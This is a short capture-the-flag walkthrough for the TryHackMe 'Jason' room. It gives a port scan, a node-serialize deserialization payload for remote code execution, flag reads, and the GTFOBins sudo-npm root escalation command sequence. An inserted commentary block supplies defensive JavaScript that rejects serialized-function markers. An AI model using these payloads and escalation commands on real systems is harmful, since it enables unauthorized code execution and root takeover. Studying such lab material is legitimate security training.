TryHackMe Jason
We are Horror LLC, we specialize in horror, but one of the scarier aspects of our company is our front-end webserver. We can’t launch our site in its current state and our level of concern regarding our cybersecurity is growing exponentially. We ask that you perform a thorough penetration test and try to compromise the root account. There are no rules for this engagement. Good luck!
In JavaScript everything is a terrible mistake. Thanks to @Luma for testing the room.
Scan the machine
rustscan -a 10.10.44.51
Investigate Web server
firefox http://10.10.44.51
Analyse Source Code
Investigate Requests
Get a reverse Shell
{"rce":"_$$ND_FUNC$$_function (){ 'nodejsshell_code' }()"}
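The payload above works because node-serialize's unserialize() treats any string starting with `_$$ND_FUNC$$_` as a function and rebuilds it with eval(). As an added example (not code from the room or from this writeup), here is how a server can read the same value with JSON.parse and reject it instead; the base64 transport, the `email` field and the function names are assumptions.

```javascript
// Marker node-serialize uses to tag a string as a function to rebuild with eval().
const FUNC_MARKER = '_$$ND_FUNC$$_';

// Recursively collect the paths of every string value carrying the marker.
function findFunctionMarkers(value, path = '$', hits = []) {
  if (typeof value === 'string') {
    if (value.includes(FUNC_MARKER)) hits.push(path);
  } else if (Array.isArray(value)) {
    value.forEach((v, i) => findFunctionMarkers(v, `${path}[${i}]`, hits));
  } else if (value !== null && typeof value === 'object') {
    for (const [k, v] of Object.entries(value)) {
      findFunctionMarkers(v, `${path}.${k}`, hits);
    }
  }
  return hits;
}

// Decode a base64 JSON value (assumed transport) with JSON.parse only, then
// enforce an allow-list schema. Nothing here ever evaluates the input.
function parseSession(b64, allowedKeys = ['email']) {
  let obj;
  try {
    obj = JSON.parse(Buffer.from(b64, 'base64').toString('utf8'));
  } catch {
    return { ok: false, reason: 'not valid JSON' };
  }
  if (obj === null || typeof obj !== 'object' || Array.isArray(obj)) {
    return { ok: false, reason: 'not an object' };
  }
  const hits = findFunctionMarkers(obj);
  if (hits.length > 0) {
    return { ok: false, reason: 'serialized function at ' + hits.join(', ') };
  }
  for (const [k, v] of Object.entries(obj)) {
    if (!allowedKeys.includes(k) || typeof v !== 'string') {
      return { ok: false, reason: 'unexpected field ' + k };
    }
  }
  return { ok: true, value: obj };
}

// Constructed samples: a benign value and the payload shape shown above.
const benign = Buffer.from(JSON.stringify({ email: 'user@example.com' })).toString('base64');
const hostile = Buffer.from(
  JSON.stringify({ rce: "_$$ND_FUNC$$_function (){ 'nodejsshell_code' }()" })
).toString('base64');

console.log(parseSession(benign));
console.log(parseSession(hostile));
```

The rejection reason names the offending path, which makes it usable as a log line for detecting exploitation attempts.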
Get User Flag
cat /home/dylan/user.txt
Escalate Privileges
Search for npm on GTFOBins, which gives the following for sudo:
export TERM=xterm
TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
sudo npm -C $TF --unsafe-perm i
Get Root Flag
cat /root/root.txt